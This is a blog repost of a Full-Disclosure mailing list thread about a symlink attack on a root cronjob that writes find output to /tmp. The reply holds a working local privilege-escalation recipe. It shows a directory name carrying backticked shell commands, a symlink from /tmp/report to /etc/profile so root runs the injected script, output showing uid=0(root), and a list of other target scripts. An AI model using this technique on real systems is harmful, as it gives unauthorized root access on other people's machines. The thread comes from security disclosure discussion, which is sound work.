symlink attack: crond considered harmful

[Full-disclosure] Symlink attack techniques 받은 편지

Werner Schalk full-disclosure에게
추가 옵션 7:42 (4시간 전)

Hi,

I am currently doing a pentest and I was wondering whether you guys would know
any symlink attack technique for the following scenario:

On a Unix system there is a cronjob set up which will use the find command to
create some sort of report and output that report to a predictable file
in /tmp. So basically the command in the crontab is something like:

15 4 * * 6 root /usr/bin/find [command] > /tmp/report.txt

Due to the fact that I can’t influence what is written to that file but
link /tmp/report to a different file (e.g. /etc/passwd) I can cause some
local disruption/problems I think. So my question now is: Is there any other
way of executing code in this scenario? Can I use file descr1ptors with this?

Any input is greatly appreciated. Thank you.

All the best,
Werner.

_______________________________________________
Full-Disclosure – We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia – http://secunia.com/

H D Moore full-disclosure에게
추가 옵션 12:16 (23분 전)

Assuming that the find command will report a directory or file that you control,
you can use the symlink to overwrite a shell scr1pt, and then place shell commands
into your file name:

$ mkdir \`cd\..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ tmp\;sh\ root.sh\`
$ echo id > /tmp/root.sh
$ chmod +x /tmp/root.sh

$ ln -s /etc/profile /tmp/report

# find / [args] > /tmp/report
# su – (executes /etc/profile)
/tmp/report: line 1: cd..: command not found
/tmp/report: line 1: ./uid=0(root): No such file or directory

Some potential shell scr1pts include /etc/profile, /etc/cron.*/*, and /etc/profiles.d/*.

-HD

On Wednesday 14 December 2005 16:42, Werner Schalk wrote:
> On a Unix system there is a cronjob set up which will use the find
> command to create some sort of report and output that report to a
> predictable file in /tmp. So basically the command in the crontab is
> something like:
>
> 15 4 * * 6 root /usr/bin/find [command] > /tmp/report.txt

Similar Posts:

Post a Comment

Your email is never published nor shared.